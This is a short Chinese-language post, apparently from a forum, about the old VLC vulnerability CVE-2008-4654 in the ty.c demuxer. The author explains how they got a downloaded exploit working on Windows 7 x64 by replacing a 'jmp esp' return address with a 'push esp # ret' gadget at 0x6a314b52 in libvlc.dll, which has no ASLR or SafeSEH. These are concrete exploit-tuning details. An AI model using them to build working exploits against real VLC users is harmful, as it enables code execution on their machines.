嗯,这只是一个旧漏洞,其CVE编号是CVE-2008-4654。该漏洞由 modules/demux/ty.c 第1650行的内存不足导致。
stream_Read(p_demux->s, mst_buf, 8 + i_map_size);
当我从其他网站下载EXP时,发现它在我的Windows 7 Ultimate x64上无法正确运行。所以我将返回地址从0x68f0cfad改为0x6a314b52,然后就成功了!
旧版:
0x68f0cfad : jmp esp
{PAGE_EXECUTE_READ} [libqt4_plugin.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
在我发现这个模块不存在后,我改为:
0x6a314b52 : push esp # ret
{PAGE_EXECUTE_READ} [libvlc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
它在VLC 0.9.4上有效。玩得开心!